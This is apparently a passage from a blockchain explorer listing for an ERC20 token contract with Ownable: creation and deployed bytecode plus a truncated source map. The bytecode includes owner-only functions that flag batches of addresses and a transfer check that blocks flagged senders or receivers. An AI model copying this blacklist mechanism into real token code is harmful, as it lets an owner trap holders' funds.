90611212565b60405180910390a3610dee848484611038565b50505050565b610dfc61091e565b73ffffffffffffffffffffffffffffffffffffffff16610e1a610565565b73ffffffffffffffffffffffffffffffffffffffff1614610e70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e67906119f0565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610fd75750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110335760011515600760009054906101000a900460ff16151514611032576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102990611a36565b60405180910390fd5b5b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561107757808201518184015260208101905061105c565b60008484015250505050565b6000601f19601f8301169050919050565b600061109f8261103d565b6110a98185611048565b93506110b9818560208601611059565b6110c281611083565b840191505092915050565b600060208201905081810360008301526110e78184611094565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611124826110f9565b9050919050565b61113481611119565b811461113f57600080fd5b50565b6000813590506111518161112b565b92915050565b6000819050919050565b61116a81611157565b811461117557600080fd5b50565b60008135905061118781611161565b92915050565b600080604083850312156111a4576111a36110ef565b5b60006111b285828601611142565b92505060206111c385828601611178565b9150509250929050565b60008115159050919050565b6111e2816111cd565b82525050565b60006020820190506111fd60008301846111d9565b92915050565b61120c81611157565b82525050565b60006020820190506112276000830184611203565b92915050565b600080600060608486031215611246576112456110ef565b5b600061125486828701611142565b935050602061126586828701611142565b925050604061127686828701611178565b9150509250925092565b600060ff82169050919050565b61129681611280565b82525050565b60006020820190506112b1600083018461128d565b92915050565b6000602082840312156112cd576112cc6110ef565b5b60006112db84828501611142565b91505092915050565b6112ed81611119565b82525050565b600060208201905061130860008301846112e4565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126113335761133261130e565b5b8235905067ffffffffffffffff8111156113505761134f611313565b5b60208301915083602082028301111561136c5761136b611318565b5b9250929050565b6000806020838503121561138a576113896110ef565b5b600083013567ffffffffffffffff8111156113a8576113a76110f4565b5b6113b48582860161131d565b92509250509250929050565b600080604083850312156113d7576113d66110ef565b5b60006113e585828601611142565b92505060206113f685828601611142565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061144757607f821691505b60208210810361145a57611459611400565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061149a82611157565b91506114a583611157565b92508282019050808211156114bd576114bc611460565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006114fd82611157565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361152f5761152e611460565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611596602583611048565b91506115a18261153a565b604082019050919050565b600060208201905081810360008301526115c581611589565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611628602683611048565b9150611633826115cc565b604082019050919050565b600060208201905081810360008301526116578161161b565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116ba602483611048565b91506116c58261165e565b604082019050919050565b600060208201905081810360008301526116e9816116ad565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061174c602283611048565b9150611757826116f0565b604082019050919050565b6000602082019050818103600083015261177b8161173f565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006117b8601d83611048565b91506117c382611782565b602082019050919050565b600060208201905081810360008301526117e7816117ab565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061184a602583611048565b9150611855826117ee565b604082019050919050565b600060208201905081810360008301526118798161183d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118dc602383611048565b91506118e782611880565b604082019050919050565b6000602082019050818103600083015261190b816118cf565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061196e602683611048565b915061197982611912565b604082019050919050565b6000602082019050818103600083015261199d81611961565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119da602083611048565b91506119e5826119a4565b602082019050919050565b60006020820190508181036000830152611a09816119cd565b9050919050565b50565b6000611a20600083611048565b9150611a2b82611a10565b600082019050919050565b60006020820190508181036000830152611a4f81611a13565b905091905056fea2646970667358221220dcf38c848222d26e979e2f89cc6078a349a72e15af2e292c5efcd93d9662d65b64736f6c63430008110033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102bc578063a9059cbb146102ec578063dd62ed3e1461031c578063f2fde38b1461034c578063f8c92ee1146103685761010b565b8063715018a61461025a5780638da5cb5b1461026457806395d89b4114610282578063a41aae01146102a05761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806366a2b8e9146101fa57806370a082311461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b60405161012591906110cd565b60405180910390f35b6101486004803603810190610143919061118d565b610416565b60405161015591906111e8565b60405180910390f35b610166610439565b6040516101739190611212565b60405180910390f35b6101966004803603810190610191919061122d565b610443565b6040516101a391906111e8565b60405180910390f35b6101b4610472565b6040516101c1919061129c565b60405180910390f35b6101e460048036038101906101df919061118d565b61047b565b6040516101f191906111e8565b60405180910390f35b610214600480360381019061020f91906112b7565b6104b2565b60405161022191906111e8565b60405180910390f35b610244600480360381019061023f91906112b7565b610508565b6040516102519190611212565b60405180910390f35b610262610551565b005b61026c610565565b60405161027991906112f3565b60405180910390f35b61028a61058e565b60405161029791906110cd565b60405180910390f35b6102ba60048036038101906102b59190611373565b610620565b005b6102d660048036038101906102d1919061118d565b6106cd565b6040516102e391906111e8565b60405180910390f35b6103066004803603810190610301919061118d565b610744565b60405161031391906111e8565b60405180910390f35b610336600480360381019061033191906113c0565b610767565b6040516103439190611212565b60405180910390f35b610366600480360381019061036191906112b7565b6107ee565b005b610382600480360381019061037d9190611373565b610871565b005b6060600580546103939061142f565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf9061142f565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b60008061042161091e565b905061042e818585610926565b600191505092915050565b6000600454905090565b60008061044e61091e565b905061045b858285610aef565b610466858585610b7b565b60019150509392505050565b60006012905090565b60008061048661091e565b90506104a78185856104988589610767565b6104a2919061148f565b610926565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610559610df4565b6105636000610e72565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461059d9061142f565b80601f01602080910402602001604051908101604052809291908181526020018280546105c99061142f565b80156106165780601f106105eb57610100808354040283529160200191610616565b820191906000526020600020905b8154815290600101906020018083116105f957829003601f168201915b5050505050905090565b610628610df4565b60005b828290508110156106c85760016002600085858581811061064f5761064e6114c3565b5b905060200201602081019061066491906112b7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106c0906114f2565b91505061062b565b505050565b6000806106d861091e565b905060006106e68286610767565b90508381101561072b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610722906115ac565b60405180910390fd5b6107388286868403610926565b60019250505092915050565b60008061074f61091e565b905061075c818585610b7b565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107f6610df4565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610865576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161085c9061163e565b60405180910390fd5b61086e81610e72565b50565b610879610df4565b60005b82829050811015610919576000600260008585858181106108a05761089f6114c3565b5b90506020020160208101906108b591906112b7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610911906114f2565b91505061087c565b505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610995576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098c906116d0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a04576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109fb90611762565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ae29190611212565b60405180910390a3505050565b6000610afb8484610767565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b755781811015610b67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5e906117ce565b60405180910390fd5b610b748484848403610926565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be190611860565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c50906118f2565b60405180910390fd5b610c64838383610f36565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ceb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce290611984565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ddb9190611212565b60405180910390a3610dee848484611038565b50505050565b610dfc61091e565b73ffffffffffffffffffffffffffffffffffffffff16610e1a610565565b73ffffffffffffffffffffffffffffffffffffffff1614610e70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e67906119f0565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610fd75750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110335760011515600760009054906101000a900460ff16151514611032576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102990611a36565b60405180910390fd5b5b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561107757808201518184015260208101905061105c565b60008484015250505050565b6000601f19601f8301169050919050565b600061109f8261103d565b6110a98185611048565b93506110b9818560208601611059565b6110c281611083565b840191505092915050565b600060208201905081810360008301526110e78184611094565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611124826110f9565b9050919050565b61113481611119565b811461113f57600080fd5b50565b6000813590506111518161112b565b92915050565b6000819050919050565b61116a81611157565b811461117557600080fd5b50565b60008135905061118781611161565b92915050565b600080604083850312156111a4576111a36110ef565b5b60006111b285828601611142565b92505060206111c385828601611178565b9150509250929050565b60008115159050919050565b6111e2816111cd565b82525050565b60006020820190506111fd60008301846111d9565b92915050565b61120c81611157565b82525050565b60006020820190506112276000830184611203565b92915050565b600080600060608486031215611246576112456110ef565b5b600061125486828701611142565b935050602061126586828701611142565b925050604061127686828701611178565b9150509250925092565b600060ff82169050919050565b61129681611280565b82525050565b60006020820190506112b1600083018461128d565b92915050565b6000602082840312156112cd576112cc6110ef565b5b60006112db84828501611142565b91505092915050565b6112ed81611119565b82525050565b600060208201905061130860008301846112e4565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126113335761133261130e565b5b8235905067ffffffffffffffff8111156113505761134f611313565b5b60208301915083602082028301111561136c5761136b611318565b5b9250929050565b6000806020838503121561138a576113896110ef565b5b600083013567ffffffffffffffff8111156113a8576113a76110f4565b5b6113b48582860161131d565b92509250509250929050565b600080604083850312156113d7576113d66110ef565b5b60006113e585828601611142565b92505060206113f685828601611142565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061144757607f821691505b60208210810361145a57611459611400565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061149a82611157565b91506114a583611157565b92508282019050808211156114bd576114bc611460565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006114fd82611157565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361152f5761152e611460565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611596602583611048565b91506115a18261153a565b604082019050919050565b600060208201905081810360008301526115c581611589565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611628602683611048565b9150611633826115cc565b604082019050919050565b600060208201905081810360008301526116578161161b565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116ba602483611048565b91506116c58261165e565b604082019050919050565b600060208201905081810360008301526116e9816116ad565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061174c602283611048565b9150611757826116f0565b604082019050919050565b6000602082019050818103600083015261177b8161173f565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006117b8601d83611048565b91506117c382611782565b602082019050919050565b600060208201905081810360008301526117e7816117ab565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061184a602583611048565b9150611855826117ee565b604082019050919050565b600060208201905081810360008301526118798161183d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118dc602383611048565b91506118e782611880565b604082019050919050565b6000602082019050818103600083015261190b816118cf565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061196e602683611048565b915061197982611912565b604082019050919050565b6000602082019050818103600083015261199d81611961565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119da602083611048565b91506119e5826119a4565b602082019050919050565b60006020820190508181036000830152611a09816119cd565b9050919050565b50565b6000611a20600083611048565b9150611a2b82611a10565b600082019050919050565b60006020820190508181036000830152611a4f81611a13565b905091905056fea2646970667358221220dcf38c848222d26e979e2f89cc6078a349a72e15af2e292c5efcd93d9662d65b64736f6c63430008110033

Deployed Bytecode Sourcemap

20517:138:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8730:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11605:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10374:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12386:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9692:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13090:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10200:109;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10545:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5843:103;;;:::i;:::-;;5202:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8949:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9793:195;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13831:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10878:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11134:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6101:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9996:196;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8730:100;8784:13;8817:5;8810:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8730:100;:::o;11605:201::-;11688:4;11705:13;11721:12;:10;:12::i;:::-;11705:28;;11744:32;11753:5;11760:7;11769:6;11744:8;:32::i;:::-;11794:4;11787:11;;;11605:201;;;;:::o;10374:108::-;10435:7;10462:12;;10455:19;;10374:108;:::o;12386:295::-;12517:4;12534:15;12552:12;:10;:12::i;:::-;12534:30;;12575:38;12591:4;12597:7;12606:6;12575:15;:38::i;:::-;12624:27;12634:4;12640:2;12644:6;12624:9;:27::i;:::-;12669:4;12662:11;;;12386:295;;;;;:::o;9692:93::-;9750:5;9775:2;9768:9;;9692:93;:::o;13090:238::-;13178:4;13195:13;13211:12;:10;:12::i;:::-;13195:28;;13234:64;13243:5;13250:7;13287:10;13259:25;13269:5;13276:7;13259:9;:25::i;:::-;:38;;;;:::i;:::-;13234:8;:64::i;:::-;13316:4;13309:11;;;13090:238;;;;:::o;10200:109::-;10257:4;10281:8;:20;10290:10;10281:20;;;;;;;;;;;;;;;;;;;;;;;;;10274:27;;10200:109;;;:::o;10545:127::-;10619:7;10646:9;:18;10656:7;10646:18;;;;;;;;;;;;;;;;10639:25;;10545:127;;;:::o;5843:103::-;5088:13;:11;:13::i;:::-;5908:30:::1;5935:1;5908:18;:30::i;:::-;5843:103::o:0;5202:87::-;5248:7;5275:6;;;;;;;;;;;5268:13;;5202:87;:::o;8949:104::-;9005:13;9038:7;9031:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8949:104;:::o;9793:195::-;5088:13;:11;:13::i;:::-;9879:9:::1;9874:107;9898:11;;:18;;9894:1;:22;9874:107;;;9965:4;9938:8;:24;9947:11;;9959:1;9947:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9938:24;;;;;;;;;;;;;;;;:31;;;;;;;;;;;;;;;;;;9918:3;;;;;:::i;:::-;;;;9874:107;;;;9793:195:::0;;:::o;13831:436::-;13924:4;13941:13;13957:12;:10;:12::i;:::-;13941:28;;13980:24;14007:25;14017:5;14024:7;14007:9;:25::i;:::-;13980:52;;14071:15;14051:16;:35;;14043:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;14164:60;14173:5;14180:7;14208:15;14189:16;:34;14164:8;:60::i;:::-;14255:4;14248:11;;;;13831:436;;;;:::o;10878:193::-;10957:4;10974:13;10990:12;:10;:12::i;:::-;10974:28;;11013;11023:5;11030:2;11034:6;11013:9;:28::i;:::-;11059:4;11052:11;;;10878:193;;;;:::o;11134:151::-;11223:7;11250:11;:18;11262:5;11250:18;;;;;;;;;;;;;;;:27;11269:7;11250:27;;;;;;;;;;;;;;;;11243:34;;11134:151;;;;:::o;6101:201::-;5088:13;:11;:13::i;:::-;6210:1:::1;6190:22;;:8;:22;;::::0;6182:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6266:28;6285:8;6266:18;:28::i;:::-;6101:201:::0;:::o;9996:196::-;5088:13;:11;:13::i;:::-;10082:9:::1;10077:108;10101:11;;:18;;10097:1;:22;10077:108;;;10168:5;10141:8;:24;10150:11;;10162:1;10150:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10141:24;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;10121:3;;;;;:::i;:::-;;;;10077:108;;;;9996:196:::0;;:::o;3911:98::-;3964:7;3991:10;3984:17;;3911:98;:::o;17858:380::-;18011:1;17994:19;;:5;:19;;;17986:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18092:1;18073:21;;:7;:21;;;18065:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18176:6;18146:11;:18;18158:5;18146:18;;;;;;;;;;;;;;;:27;18165:7;18146:27;;;;;;;;;;;;;;;:36;;;;18214:7;18198:32;;18207:5;18198:32;;;18223:6;18198:32;;;;;;:::i;:::-;;;;;;;;17858:380;;;:::o;18529:453::-;18664:24;18691:25;18701:5;18708:7;18691:9;:25::i;:::-;18664:52;;18751:17;18731:16;:37;18727:248;;18813:6;18793:16;:26;;18785:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18897:51;18906:5;18913:7;18941:6;18922:16;:25;18897:8;:51::i;:::-;18727:248;18653:329;18529:453;;;:::o;14737:840::-;14884:1;14868:18;;:4;:18;;;14860:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;14961:1;14947:16;;:2;:16;;;14939:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;15016:38;15037:4;15043:2;15047:6;15016:20;:38::i;:::-;15067:19;15089:9;:15;15099:4;15089:15;;;;;;;;;;;;;;;;15067:37;;15138:6;15123:11;:21;;15115:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;15255:6;15241:11;:20;15223:9;:15;15233:4;15223:15;;;;;;;;;;;;;;;:38;;;;15458:6;15441:9;:13;15451:2;15441:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;15508:2;15493:26;;15502:4;15493:26;;;15512:6;15493:26;;;;;;:::i;:::-;;;;;;;;15532:37;15552:4;15558:2;15562:6;15532:19;:37::i;:::-;14849:728;14737:840;;;:::o;5367:132::-;5442:12;:10;:12::i;:::-;5431:23;;:7;:5;:7::i;:::-;:23;;;5423:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5367:132::o;6462:191::-;6536:16;6555:6;;;;;;;;;;;6536:25;;6581:8;6572:6;;:17;;;;;;;;;;;;;;;;;;6636:8;6605:40;;6626:8;6605:40;;;;;;;;;;;;6525:128;6462:191;:::o;19582:200::-;19712:8;:12;19721:2;19712:12;;;;;;;;;;;;;;;;;;;;;;;;;:30;;;;19728:8;:14;19737:4;19728:14;;;;;;;;;;;;;;;;;;;;;;;;;19712:30;19708:72;;;19771:4;19752:23;;:15;;;;;;;;;;;:23;;;19744:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;19708:72;19582:200;;;:::o;20386:124::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:117::-;5649:1;5646;5639:12;5663:117;5772:1;5769;5762:12;5786:117;5895:1;5892;5885:12;5926:568;5999:8;6009:6;6059:3;6052:4;6044:6;6040:17;6036:27;6026:122;;6067:79;;:::i;:::-;6026:122;6180:6;6167:20;6157: